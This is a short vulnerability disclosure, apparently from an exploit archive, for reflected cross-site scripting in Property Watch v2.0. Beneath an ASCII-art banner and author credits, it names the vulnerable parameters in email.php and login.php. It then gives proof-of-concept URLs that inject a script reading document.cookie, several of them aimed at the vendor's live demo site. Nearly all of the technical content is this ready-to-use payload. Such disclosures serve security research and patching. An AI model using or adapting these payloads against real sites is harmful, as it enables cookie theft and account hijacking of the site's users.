Property Watch version 2.0 suffers from a cross site scripting vulnerability.
b444fe0fec68b14e198ac6d8d3f1e08df6eee05486d9fd003553c496c42c5713
/*
_____ _ ___ __
| ____|_ _(_) \ \ / /_ _ _ _
| _| \ \ / / | |\ \ /\ / / _` | | | |
| |___ \ V /| | | \ V V / (_| | |_| |
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |
|___/
_____
|_ _|__ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Property Watch v2.0 Remote XSS Vulnerabilities
Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : https://www.propertywatchscript.com/
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: https://unkn0wn.ws/board/index.php
*/
[+] Exploit XSS:
- Vulnerable code in email.php (videoid)
- Vulnerable code in login.php (redirect)
- Poc:
https://127.0.0.1/tools/email.php?videoid=[XSS]
https://127.0.0.1/tools/login.php?redirect=[XSS]
https://demo.propertywatchscript.com/email.php?videoid="><script>alert(document.cookie);</script>
https://demo.propertywatchscript.com/login.php?redirect="><script>alert(document.cookie);</script>